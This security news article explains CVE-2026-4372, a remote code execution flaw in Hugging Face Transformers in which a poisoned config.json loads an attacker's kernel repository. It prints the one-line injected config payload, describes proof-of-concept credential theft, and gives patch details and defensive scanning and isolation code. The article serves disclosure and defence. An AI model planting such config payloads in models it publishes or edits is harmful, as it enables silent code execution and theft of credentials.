AI Security Wire

CVE-2026-4372: Hugging Face Transformers RCE via Config Injection

A critical vulnerability in Hugging Face Transformers, tracked as CVE-2026-4372, allowed arbitrary code execution on machines that loaded a poisoned model through the standard from_pretrained() call with the optional kernels package installed. Exploitation needed no user interaction beyond the load itself and produced no warnings. The flaw, discovered by Pluto Security researcher Yotam Perkal and patched in Transformers v5.3.0 on March 3, 2026, exploited a config deserialization path that completely bypassed trust_remote_code=False, the library’s documented safety boundary. Public CVE disclosure came 81 days after the patch, so users had no official signal while vulnerable versions accumulated another 232 million downloads.

How the Attack Works

The exploit chains three separate design weaknesses in the library.

First, configuration_utils.py processes remote model configs by applying every JSON field to the config object via a generic setattr loop. There is no allowlist, no filtering of internal attributes, and no validation of field names against an expected schema. Any key in config.json lands directly on the config object.
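The pattern described above can be illustrated with a minimal sketch. ToyConfig and apply_fields_unfiltered are hypothetical names invented for this example; this is not the Transformers source, only the general shape of an unfiltered setattr loop.

```python
import json


class ToyConfig:
    """Hypothetical stand-in for a model config class (not the real Transformers class)."""

    def __init__(self):
        self.hidden_size = 768
        # Intended to be set only by library code, never by remote data.
        self._attn_implementation_internal = None


def apply_fields_unfiltered(config, raw_json):
    """Copy every JSON key onto the object: no allowlist, no schema check."""
    for key, value in json.loads(raw_json).items():
        setattr(config, key, value)
    return config


# A remote config can overwrite the "private" attribute as easily as a public one.
remote = '{"hidden_size": 1024, "_attn_implementation_internal": "owner/repo"}'
cfg = apply_fields_unfiltered(ToyConfig(), remote)
print(cfg.hidden_size, cfg._attn_implementation_internal)
```

Nothing in the loop distinguishes a schema field from an internal one, which is the property the exploit relies on.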

Second, a specific private attribute, _attn_implementation_internal, controls which attention kernel the library loads. Because it starts with an underscore, it was treated as internal and excluded from the sanitization logic that checks the public attn_implementation field. The underscore prefix offered no protection; it only bypassed the guard.
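A guard of this kind might look like the sketch below. The function name, the allowed-value set, and the error message are assumptions made for illustration; the actual sanitization logic in the library is not reproduced here.

```python
# Illustrative allowed values for the public field; the real list may differ.
ALLOWED_ATTN = {"eager", "sdpa", "flash_attention_2"}


def sanitize_public_only(fields):
    """Validate the public key only; underscore-prefixed keys pass through unchecked."""
    clean = {}
    for key, value in fields.items():
        if key == "attn_implementation" and value not in ALLOWED_ATTN:
            raise ValueError(f"unsupported attn_implementation: {value!r}")
        clean[key] = value
    return clean


# The public field is rejected, while the private twin carrying the same value is accepted.
passed = sanitize_public_only({"_attn_implementation_internal": "owner/repo"})
print(passed)
```

The check is keyed on one exact field name, so a differently named attribute that feeds the same code path never reaches it.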

Third, when _attn_implementation_internal holds a value matching the owner/repo pattern, the library’s hub_kernels.py component interprets it as a Hugging Face Hub kernel repository reference. It downloads the repository and imports it via importlib.import_module(). No sandboxing. No code signing. No integrity check. No user prompt.
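For reviewers, the owner/repo shape is easy to recognize mechanically. The regular expression below is an assumption about what such a pattern could look like, not the one used in hub_kernels.py; it is shown only as a way to flag config values that resemble a Hub repository reference.

```python
import re

# Hypothetical pattern: two non-empty name segments separated by exactly one slash.
REPO_REF = re.compile(r"[A-Za-z0-9][\w.\-]*/[A-Za-z0-9][\w.\-]*")


def looks_like_hub_repo(value):
    """Return True when a config value has the owner/repo shape."""
    return isinstance(value, str) and REPO_REF.fullmatch(value) is not None


for candidate in ("sdpa", "flash_attention_2", "attacker/malicious-kernel"):
    print(candidate, looks_like_hub_repo(candidate))
```

Ordinary attention implementation names contain no slash, so a value that matches this shape in an attention-related field deserves a closer look.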

The full attack requires two attacker-controlled repositories. The first is a kernel repo containing a malicious __init__.py. The second is a model repo with an otherwise-normal config.json containing:

{
  "_attn_implementation_internal": "attacker/malicious-kernel"
}

When a victim calls from_pretrained("attacker/poisoned-model"), the library deserializes the config, sets the underscore attribute, identifies the kernel repo reference, downloads it, and executes it, all before from_pretrained() returns. The victim sees nothing unusual. Pluto Security’s proof-of-concept demonstrated silent exfiltration of AWS credentials, SSH keys, and environment files in the time the standard model load takes.

Scope and Timeline

The vulnerable code path was introduced in Transformers 4.56.0, released August 29, 2025. It remained exploitable through 5.2.x. Yotam Perkal reported the issue via the huntr bug bounty platform on February 23, 2026. Hugging Face merged the fix and released v5.3.0 eight days later, on March 3, 2026. The CVE was published on May 24, 2026, creating an 81-day window where the patch existed but no official advisory prompted users to apply it.

The package’s download scale makes the exposure count significant. Transformers has approximately 2.2 billion total PyPI installs and roughly 146 million monthly downloads. Pluto Security estimated that vulnerable versions represented about 35% of all Transformers installs at the time of disclosure. By the time CVE-2026-4372 was published, vulnerable versions had accumulated 232 million downloads since the patch landed. As of early June 2026, 7 to 8 million downloads per week were still landing on vulnerable versions.

The kernels optional package is a prerequisite for exploitation, and it had roughly 1.7 million downloads. This limits the total exploitable population compared to raw Transformers download numbers, but the population it does cover includes exactly the teams running GPU-optimised inference in production: enterprise ML infrastructure, cloud inference deployments, and research clusters.

What the Patch Changes

PR #44395 applied two fixes.

The setattr loop now maintains an explicit denylist that blocks _attn_implementation_internal and _experts_implementation_internal from being set via config deserialization. Neither field can be injected through a remote config.json.
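A denylist of this kind could be sketched as follows. The two field names come from the description above; the function name and the use of SimpleNamespace as a config object are assumptions for illustration, and the real patch may be structured differently.

```python
import json
from types import SimpleNamespace

# Field names as reported for the patch; everything else here is illustrative.
BLOCKED_FIELDS = frozenset({
    "_attn_implementation_internal",
    "_experts_implementation_internal",
})


def apply_fields_with_denylist(config, raw_json):
    """Set JSON fields on the config, skipping denylisted keys; return the skipped keys."""
    skipped = []
    for key, value in json.loads(raw_json).items():
        if key in BLOCKED_FIELDS:
            skipped.append(key)
            continue
        setattr(config, key, value)
    return skipped


cfg = SimpleNamespace()
remote = '{"hidden_size": 1024, "_attn_implementation_internal": "owner/repo"}'
skipped = apply_fields_with_denylist(cfg, remote)
print(cfg, skipped)
```

Returning the skipped keys rather than dropping them silently gives callers something to log, which is useful when a blocked field is itself a sign of tampering.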

Kernel loading now requires trust_remote_code=True for any kernel repository outside the official kernels-community Hugging Face organization. This extends the existing trust boundary to cover the kernel-loading code path that the original implementation left ungated.
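The consent rule can be expressed as a small predicate. This is a sketch of the policy as described, not the library's code: kernel_load_allowed is a hypothetical name, and the example repository names are made up.

```python
TRUSTED_KERNEL_ORG = "kernels-community"  # organization named in the patch description


def kernel_load_allowed(repo_id, trust_remote_code=False):
    """Allow official-org kernels by default; require explicit consent for any other repo."""
    owner, _, name = repo_id.partition("/")
    if not owner or not name:
        raise ValueError(f"expected 'owner/repo', got {repo_id!r}")
    return owner == TRUSTED_KERNEL_ORG or trust_remote_code


# Hypothetical repository names, used only to exercise the rule.
print(kernel_load_allowed("kernels-community/example-kernel"))
print(kernel_load_allowed("attacker/malicious-kernel"))
print(kernel_load_allowed("attacker/malicious-kernel", trust_remote_code=True))
```

The default stays closed: a third-party kernel loads only when the caller has opted in with the same flag that already gates remote modeling code.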

Together, these changes close the injection vector and align kernel loading with the consent model users already understand.

Threat Model for Model Registries

CVE-2026-4372 sits at an uncomfortable intersection: it requires a malicious model to be published on Hugging Face Hub and a victim to load it. Hugging Face’s malware scanning runs against model weights and does not have visibility into the behavioral consequences of config fields. A config.json containing _attn_implementation_internal set to an attacker repo would not trigger existing scanners because the field name looks like an internal attribute and the referenced repo might itself contain legitimate-looking Python.

The attack is plausible in several scenarios. A compromised legitimate model account could add the field to an existing trusted model. A typosquatted model name could distribute it to users making common naming mistakes. A supply chain compromise of an organization’s private Hugging Face model registry would expose every team that loaded from that registry.

This is a different threat profile from the standard supply chain attack on PyPI. Model loading is increasingly treated as a data operation rather than a code execution event, and that mental model is wrong.

Defensive Guidance

Upgrade to Transformers 5.3.0 or later. This is the only complete fix. Version 5.3.0 has been available since March 3, 2026.

Scan cached config.json files. Any previously downloaded model that contains the _attn_implementation_internal field should be treated as suspect. The field has no legitimate use in user-facing configs. Grep or scan your Hugging Face cache directory (typically ~/.cache/huggingface/hub/) for this key.
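One way to run that scan is the short script below. It is a minimal sketch: find_suspect_configs is a hypothetical helper, it inspects only top-level keys of each config.json, and it also checks _experts_implementation_internal on the assumption that the second field blocked by the patch is equally unexpected in a downloaded config.

```python
import json
from pathlib import Path

SUSPECT_KEYS = ("_attn_implementation_internal", "_experts_implementation_internal")


def find_suspect_configs(cache_dir):
    """Return (path, keys) pairs for every config.json under cache_dir with a suspect key."""
    hits = []
    for path in Path(cache_dir).expanduser().rglob("config.json"):
        try:
            data = json.loads(path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable, badly encoded, or malformed file: skip it
        if not isinstance(data, dict):
            continue
        found = [key for key in SUSPECT_KEYS if key in data]
        if found:
            hits.append((path, found))
    return hits


# Example usage against the default cache location:
#   for path, keys in find_suspect_configs("~/.cache/huggingface/hub"):
#       print(f"{path}: {', '.join(keys)}")
```

A hit means the model's origin and the referenced repository should be investigated; an empty result only shows that no cached config carries these keys at the top level.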

Run model loading in isolated containers. Until provenance guarantees exist across the Hub, treat from_pretrained() as equivalent to running untrusted code. That means no host credentials in the environment, no SSH keys mounted, no outbound network access beyond what the load itself requires, and no write access to production storage. A container that can only write to a scratch directory and exit dramatically limits what a malicious kernel can exfiltrate.
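Where a container is not yet in place, part of the "no host credentials in the environment" requirement can be approximated by launching the loader in a child process with a scrubbed environment. This is a partial measure on a POSIX host, not a substitute for container isolation: it does not restrict filesystem or network access. The allowlist and function names are assumptions for illustration.

```python
import os
import subprocess
import sys

# Hypothetical allowlist; extend it only with variables the loader genuinely needs.
SAFE_ENV_KEYS = ("PATH", "LANG", "HF_HOME")


def scrubbed_env(source=None):
    """Return a copy of the environment containing only allowlisted variables."""
    source = os.environ if source is None else source
    return {key: source[key] for key in SAFE_ENV_KEYS if key in source}


def run_loader(script_path, scratch_dir):
    """Run a model-loading script in a child process without inherited secrets."""
    env = scrubbed_env()
    # Pointing HOME at scratch keeps default lookups of ~/.aws and ~/.ssh away from
    # the real home directory; absolute paths remain readable without a container.
    env["HOME"] = scratch_dir
    return subprocess.run([sys.executable, script_path], env=env, cwd=scratch_dir, check=False)
```

Tokens and cloud credentials exported as environment variables never reach the child process, which removes one of the easiest exfiltration targets.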

Verify the kernels package version. If your environment requires the kernels package, confirm it is paired with a patched Transformers version. Unpatched Transformers plus any version of kernels is the exploitable combination.
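The version check can be automated with the standard library alone. The sketch below encodes the affected range given in this article (4.56.0 up to, but not including, 5.3.0); the helper names are hypothetical, and pre-release suffixes are ignored, so development builds should be verified by hand.

```python
import re
from importlib import metadata

FIRST_VULNERABLE = (4, 56, 0)
FIRST_PATCHED = (5, 3, 0)


def release_tuple(version):
    """Parse the leading X.Y[.Z] digits; suffixes such as 'rc1' or '.dev0' are ignored."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part or 0) for part in match.groups())


def in_vulnerable_range(version):
    """True when the version falls in the range reported as exploitable."""
    return FIRST_VULNERABLE <= release_tuple(version) < FIRST_PATCHED


def installed_version(package):
    """Return the installed version string, or None when the package is absent."""
    try:
        return metadata.version(package)
    except metadata.PackageNotFoundError:
        return None


def exposure_report():
    """Flag the exploitable combination: vulnerable Transformers plus any kernels install."""
    transformers_version = installed_version("transformers")
    kernels_version = installed_version("kernels")
    exposed = (
        transformers_version is not None
        and kernels_version is not None
        and in_vulnerable_range(transformers_version)
    )
    return {"transformers": transformers_version, "kernels": kernels_version, "exposed": exposed}


print(exposure_report())
```

Run it inside each environment or image that loads models, since the result reflects only the interpreter it executes in.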

Add _attn_implementation_internal to your model security review checklist. Any model undergoing internal security review before deployment should have its config.json checked for this field. Cisco’s Model Provenance Kit includes this check in its post-patch release.

The 81-day gap between patch and CVE advisory is a systemic problem. Hugging Face had shipped the fix; the exposure came from vulnerable versions continuing to propagate silently, with no official prompt to update. Security teams relying on CVE feeds alone would have been unaware until late May that a remote code execution path existed in one of the most widely deployed ML libraries in the world.

Frequently Asked Questions

Does exploiting CVE-2026-4372 require trust_remote_code=True?
No, and that is precisely what makes this vulnerability dangerous. The trust_remote_code flag gates one explicit code-loading path, but CVE-2026-4372 exploits a separate kernel-loading mechanism triggered through config deserialization. Victims using the default trust_remote_code=False are fully exposed. The patch adds a consent requirement specifically to this kernel-loading path.

What does a poisoned Hugging Face model config look like?
The malicious config.json contains one additional field: _attn_implementation_internal set to a value matching the attacker/kernel-repo pattern. Everything else looks normal. The model may function correctly after loading, which makes detection without scanning for that specific field very difficult. Pluto Security demonstrated that no errors, warnings, or prompts are generated during exploitation.

Is the kernels package required for exploitation?
Yes. The exploit requires the optional kernels package, a companion library for GPU-optimised attention implementations. That package had approximately 1.7 million downloads, and the population most likely to have it installed includes enterprise ML teams running inference-optimised workloads. Users running standard CPU inference without the kernels package are not reachable via this attack path.